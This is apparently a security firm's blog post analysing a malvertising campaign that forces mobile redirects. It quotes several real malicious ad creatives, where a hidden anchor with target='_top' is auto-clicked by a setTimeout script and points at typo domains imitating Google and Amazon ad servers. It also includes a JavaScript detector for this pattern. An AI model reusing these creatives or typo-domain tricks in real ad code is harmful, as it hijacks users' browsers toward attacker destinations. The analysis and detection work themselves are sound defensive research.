Hiding In Plain Sight: How One Malvertiser Abuses Typos of Google and Amazon Ad Serving Domains
Disclaimer: This blog post includes code snippets from actual creatives that have been served on the web. We do our best to redact the identifying information of any intermediate ad-tech vendors or hijacked publishers, because good services are often used and abused by bad actors. It’s important not to interpret an individual ad-tech vendor’s presence in a bad creative as an overt act of malvertising or fraud.
In my last post, I talked about how most forced redirects come from a well known loophole that allows the following to be executed cross-domain:
window.top.location = "http://redirect"

With this having been an issue for some years, it’s safe to say that the more sophisticated bad actors know that we know their tricks, and they will go to great lengths to obfuscate their code and conceal their behavior.
In recent months, we’ve seen a lot of activity emanating from one bad actor in particular, and it stands out to me that they have a pretty clever approach to the mobile redirect.
Check out this ad tag:
<a target=_blank href='https://itunes.apple.com/us/app/world-of-tanks-blitz/id859204347?mt=8'><img src='https://[REDACTED]/getad.img?libBID=418779'></img></a><a hidden id='OivvTkFYHFk' target='_top' href='http://tpc.googlesyndlcation.com/765f7543-d944-406c-9146-b3b292397327?siteid={siteid}&sitedomain=220926845'></a>
<script type='text/javascript'>function TpoBFJDMsFSaTa(){document.getElementById('OivvTkFYHFk').click();}setTimeout(TpoBFJDMsFSaTa, 10000);</script>

Before we dive into the code, I’d like to point out the use of a very deceiving domain:
http://tpc.googlesyndlcation.com/765f7543-d944-406c-9146-b3b292397327?siteid={siteid}&sitedomain=220926845

At first glance, tpc.googlesyndlcation.com might look like the familiar Google ad serving endpoint that we have all seen countless times before. Let’s take a look at what happens if we convert the domain to all caps:
TPC.GOOGLESYNDLCATION.COM

The typo domain alone (a lowercase L standing in for the I of googlesyndication, which the capitals make obvious) should sound all kinds of alarms and warrant blacklisting, but perhaps even more interesting is the creative tag and its elegant method of spawning a redirect. Let’s start by splitting up the tag into smaller, easier to digest segments:
<a target=_blank href='https://itunes.apple.com/us/app/world-of-tanks-blitz/id859204347?mt=8'><img src='https://[REDACTED]/getad.img?libBID=418779'></img></a>

Here we have an image and a clickthrough link. The landing page is an iTunes game that matches with the creative being served. This could very well be ripped off from a legitimate ad campaign or just as easily faked. This is not the malicious part of this tag, but merely a sort of “cloak” to make it look legitimate.
<a hidden id='OivvTkFYHFk' target='_top' href='http://tpc.googlesyndlcation.com/765f7543-d944-406c-9146-b3b292397327?siteid={siteid}&sitedomain=220926845'></a>

This is where the tag gets interesting. Let’s break down this hidden anchor tag further:
<a hidden
This tag will be hidden from view.

id='OivvTkFYHFk'
Assign a cryptic ID to this <a> tag.

target='_top'
This tells the browser to load the link destination in the full body of the browser window if the link is being loaded from within an iframe. It’s essentially a clever way of doing window.top.location! Does that ring a bell?
<script type='text/javascript'>function TpoBFJDMsFSaTa(){document.getElementById('OivvTkFYHFk').click();}setTimeout(TpoBFJDMsFSaTa, 10000);</script>

This JavaScript one-liner defines a function that finds the hidden link and clicks it:

function TpoBFJDMsFSaTa(){document.getElementById('OivvTkFYHFk').click();}

And then sets a timer to execute that function in 10 seconds:

setTimeout(TpoBFJDMsFSaTa, 10000);

Essentially, the attacker here put together a window.top.location redirect without ever having to use that notorious and easily detectable line of code!
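To make the detection side concrete, here is an added example (not Confiant’s code and not taken from the creative) that statically checks a creative’s markup for both signals discussed above: a hidden anchor with target='_top' that script clicks via getElementById().click(), and an href host within a couple of edits of a legitimate ad-serving domain. It assumes googlesyndication.com and amazon-adsystem.com as the legitimate hosts being imitated, and runs over a constructed sample creative with placeholder URLs.

```javascript
// Added example (not Confiant's or the malvertiser's code): static checks for the
// forced-redirect pattern described above, run over the raw creative markup.
// Assumption: these registrable domains are the legitimate ad hosts being imitated.
const KNOWN_AD_HOSTS = ["googlesyndication.com", "amazon-adsystem.com"];
// Levenshtein distance between two strings (iterative DP).
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++)
    for (let j = 1; j <= b.length; j++)
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));
  return d[a.length][b.length];
}
// Crude registrable-domain approximation: the last two labels of the host.
function baseDomain(host) { return host.toLowerCase().split(".").slice(-2).join("."); }
// The known host that `host` imitates (within 2 edits), or null if exact or unrelated.
function lookalikeOf(host) {
  const base = baseDomain(host);
  if (KNOWN_AD_HOSTS.includes(base)) return null;
  return KNOWN_AD_HOSTS.find(k => editDistance(base, k) <= 2) || null;
}
// Value of attribute `name` in an attribute string; handles quoted and bare values.
function attr(attrs, name) {
  const m = attrs.match(new RegExp("\\b" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i"));
  return m ? (m[1] || m[2] || m[3] || "") : null;
}
// Anchors carrying the bare `hidden` attribute and target=_top: the out-of-frame hop.
function hiddenTopAnchors(html) {
  return [...html.matchAll(/<a\b([^>]*)>/gi)].map(m => m[1])
    .filter(s => /(?:^|\s)hidden(?=[\s=>]|$)/i.test(s) && (attr(s, "target") || "").toLowerCase() === "_top")
    .map(s => ({ id: attr(s, "id"), href: attr(s, "href") || "" }));
}
// Element ids that script clicks programmatically (the setTimeout trigger).
function scriptedClicks(html) {
  return [...html.matchAll(/getElementById\(\s*['"]([^'"]+)['"]\s*\)\s*\.click\(\)/g)].map(m => m[1]);
}
// One finding per hidden top-frame anchor: is it auto-clicked, is its host a typo of a known ad host?
function analyzeCreative(html) {
  const clicked = new Set(scriptedClicks(html));
  return hiddenTopAnchors(html).map(a => {
    const host = (a.href.match(/^https?:\/\/([^/?#]+)/i) || [])[1] || "";
    return { id: a.id, host, autoClicked: clicked.has(a.id), lookalikeOf: lookalikeOf(host) };
  });
}
// Constructed sample modelled on the creative above (placeholder landing page and path).
const SAMPLE = "<a target=_blank href='https://example.invalid/landing'><img src='https://example.invalid/ad.gif'></img></a>" +
  "<a hidden id='OivvTkFYHFk' target='_top' href='http://tpc.googlesyndlcation.com/PLACEHOLDER?siteid={siteid}'></a>" +
  "<script>function f(){document.getElementById('OivvTkFYHFk').click();}setTimeout(f, 10000);</script>";
```

Running analyzeCreative(SAMPLE) yields one finding with autoClicked true and lookalikeOf "googlesyndication.com"; a creative whose hidden anchor points at the correctly spelled host still gets flagged for the auto-click, just without the lookalike match.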
Now that we have identified a cohesive pattern in how this particular bad actor handles ad serving, we can take some of the data points from our analysis and see what else we can find in our database of creative ad traces.
At Confiant, we see a large volume of creatives as they serve in a live environment, but we also scan creative tags for suspicious activity in a variety of virtual environments. The most fascinating findings come out of comparing the behaviors of a malicious vendor in these different environments. Such a comparison will usually surface the presence of anti-malware evasion tactics, if they exist.
Right away, we find similar bad creatives. Here’s an example:
document.write("<a target=_blank href='https://itunes.apple.com/us/app/harrys-shaving-grooming/id990024014?mt=8'><img src='https://[REDACTED]/storage/7/8/c/78ccf25b91cbbd6625bdca4cea488247a3f58ac0.gif'></img></a><a hidden id='hid_1' target='_top' href='http://aax-eu.amazon-absystem.com/c3c3f4db-67d2-4837-9b1c-665e4037a30c?siteid={siteid}&sitedomain=[site_id]'></a><scr"+"ipt>setTimeout(function(){document.getElementById('hid_1').click();}, 10000);</scr"+"ipt>")

Looks like it’s a creative with the same M.O., but with a new ad-tech typo domain for the blacklist:
http://aax-eu.amazon-absystem.com
Perusing our collection of creative scans surfaces another interesting find:
This is an excerpt from a HAR dump of one of our scans, where we have the all too familiar TPC.GOOGLESYNDICATION.COM tag:

document.write("<a target=_blank href='https://[REDACTED]/fitness-equipment-financing'><img src='https://tpc.googlesyndication.com/simgad/4463120308239653022'></img></a>")

If we look closely, we’ll notice a couple of fascinating details. First, we see right away that the tag is incomplete, but more importantly we see that this time, the bad actor is masquerading their activity by borrowing a real googlesyndication.com tag. Furthermore, the malicious JavaScript was omitted during this scan, which tells us that the redirect code is not actually served on every single impression!
Here it is again captured from a live impression:
<a target=_blank href='https://[REDACTED]/fitness-equipment-financing'><img src='https://tpc.googlesyndication.com/simgad/4463120308239653022'></img></a><a hidden id='JFDGFlwYj' target='_top' href='http://tpc.googlesyndlcation.com/f0b20741-50db-4958-8633-328b117ec7a8?siteid={siteid}&sitedomain=pbh-network.com'></a>
<script type='text/javascript'>function OdeetudfgqeoS(){document.getElementById('JFDGFlwYj').click();}setTimeout(OdeetudfgqeoS, 8000);</script>

But of course this comes as no surprise. We’ve seen examples of the same exact markup in other iterations of creative scans as well. This huge difference between the scan and the live capture makes it pretty clear that this bad actor is using some advanced targeting to determine when to serve the redirect code and when not to. Furthermore, the domain found to be serving the ad in the first place gives a very important glimpse into this malvertiser’s sophistication:
https://idsync.wetwearsuits.com/www/pixel/tap.php?cid=MTItMmJmNGY2ZTgwM2MxNzRhLTM5OV8x&bid=1333&source=...

Certainly “wetwearsuits.com” is likely an inappropriate ad-serving domain, but there is more than that happening here. First of all, the structure of the ad call is disguised with the “idsync” prefix, which is a very common endpoint name for cookie matching across some big ad-tech vendors. In addition, these folks went so far as to host a realistic but fake e-commerce store on the wetwearsuits.com domain, likely to throw off human analysis of the domain.
The domain is at this time defunct, so I can’t offer a screenshot, but I can offer a further glimpse into where it came from:
This all raises the question: why? Why invest $100 into a lame “starter site” instead of registering a new one for $9.99, especially if the original starter content is going to be tossed out for pirated e-commerce content? My best guess is that the folks behind this campaign understand the value in an aged domain.
It’s worth noting, though, that the short lifespan here is not an outlier. In only several months these guys have bought the domain, pirated a site, deployed their ad serving mechanism, run a malvertising campaign, and discarded the domain completely, only to move on to the next one.
As a closing thought, I want to pose a question:
To what extent are vendors of internet infrastructure complicit in this activity? After all, there is not a single scenario where it’s okay for anyone to use the GOOGLESYNDLCATION or AMAZON-ABSYSTEM domains for ANY reason. I have since contacted the abuse departments of the domain owner’s registrar, DNS, and hosting providers, but have gotten little to no action in response.